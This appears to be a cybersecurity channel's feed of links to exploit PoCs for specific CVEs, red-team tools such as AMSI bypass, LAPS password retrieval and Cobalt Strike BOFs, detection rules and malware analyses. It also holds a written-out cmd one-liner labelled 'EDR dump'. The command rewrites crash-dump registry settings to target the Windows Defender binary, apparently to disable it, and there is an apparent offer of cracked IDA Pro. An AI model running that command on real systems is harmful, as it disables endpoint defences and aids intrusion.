İbrahim BALOĞLU - Siber Güvenlik Paylaşımları

#tools #MLSecOps 1. Access large language models from CLI https://github.com/simonw/llm 2. CVE-2023-44467: RCE in langchain PALChain https://arimlabs.ai/news/bypass-of-cve-2023-44467 3. AI Agent Security https://www.promptfoo.dev/blog/agent-security ]-> https://www.promptfoo.dev/docs/red-team/agents

IDA PRO 9.1 * Windows/Linux/macOS + boundles + SDK * DownLoad_me

#tools #Blue_Team_Techniques 1. Static Analysis of GUID Encoded Shellcode https://isc.sans.edu/diary/Static+Analysis+of+GUID+Encoded+Shellcode/31774 2. Sigma Rule for CVE-2025-29927 (Next.js) Detection https://github.com/elshaheedy/CVE-2025-29927-Sigma-Rule ]-> Nuclei template 3. CVE-2025-30066 Detection Tool https://github.com/Checkmarx/Checkmarx-CVE-2025-30066-Detection-Tool

Güvenlik Operasyonları Uzmanı (SOC Analist) https://www.linkedin.com/jobs/view/4186266416

#Offensive_security #Red_Team_Tactics NoSQL injection Part 1 - General details Part 2 - Getting rid of pre-/post-conditions in NoSQLi Part 3 - NoSQL error-based injection

#tools #Offensive_security 1. Extensive and updated reference for 403 (Forbidden) bypass techniques for pentesters https://github.com/Arcanum-Sec/hack_tips/blob/main/403bypass.md 2. 32/64-bit position independent implant template https://github.com/Cracked5pider/Stardust 3. goLAPS - Retrieve LAPS passwords from a domain https://github.com/sensepost/goLAPS 4. AMSI Bypass: In-memory patching https://medium.com/@drop_tables/amsi-bypass-in-memory-patching-e9b4abbc617e

#Red_Team_Tactics 1. New Method to Leverage Unsafe Reflection and Deserialisation to RCE on Rails https://www.elttam.com/blog/rails-sqlite-gadget-rce 2. Tool to automate GPO attack vectors through NTLM relaying https://github.com/synacktiv/GPOddity

#exploit 1. CVE-2025-27636, CVE-2025-29891: Apache Camel RCE PoC/Detection 2. CVE-2024-0760: DoS in ISC BIND DNS 3. CVE-2025-24813: Apache Tomcat RCE 4. CVE-2015-0009: SMB Security Feature Bypass (SMB Signing) 5. CVE-2024-0582, CVE-2024-35880: A Series of io_uring pbuf Vulnerabilities

BurpSuite Extension * Xkeys

CVE-2025–27364 * MITRE Caldera Security Advisory — Remote Code Execution * POC

#exploit 1. ENOMEM In Linux Kernel https://u1f383.github.io/linux/2025/03/04/enomem-in-linux-kernel.html 2. CVE-2025-21333: Heap-based BoF in vkrnlintvsp.sys https://github.com/MrAle98/CVE-2025-21333-POC 3. Solr server RCE PoC: https://www.hacefresko.com/posts/rce-on-solr-server-via-replication

#Malware_analysis 1. Havoc: SharePoint with Microsoft Graph API turns into FUD C2 https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2 2. Deep Dive Into Allegedly AI-Generated FunkSec Ransomware https://hybrid-analysis.blogspot.com/2025/03/hybrid-analysis-deep-dive-into.html 3. Uncovering .NET Malware Obfuscated by Encryption and Virtualization https://unit42.paloaltonetworks.com/malware-obfuscation-techniques

#Infographics #Offensive_security AD Pentesting Mindmap https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg

#tools #Red_Team_Tactics 1. Draugr - BOF with Synthetic Stackframe https://github.com/NtDallas/Draugr 2. Thread Hijacking Iceberg: Deep Dive into Phantom Call & RtlRemoteCall https://sabotagesec.com/thread-hijacking-iceberg-deep-dive-into-phantom-call-rtlremotecall 3. Cobalt Strike BOF that leverages WinRM plugins to execute arbitrary DLLs in a target system https://github.com/FalconForceTeam/bof-winrm-plugin-jump

#DFIR #Malware_analysis 1. WMI Malware: The Complete Forensics Guide https://www.cybertriage.com/blog/wmi-malware 2. Confluence Exploit Leads to LockBit Ransomware https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware

CVE-2025-0108 Palo Alto Networks PAN-OS * POC exploit

EDR dump (for fun разумеется)

cmd /v/c "set R=reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /f /v&!R! CrashDumpEnabled /d 7 /t 4&!R! DumpFileSize /d 666 /t 4&for /f "delims=*" %i in ('sc qc WinDefend^|find "PATH_"')do (set t=%i&!R! DedicatedDumpFile /d !t:~29,-1!)"

CVE-2024-12754 AnyDesk * wtf * LPE poc exploit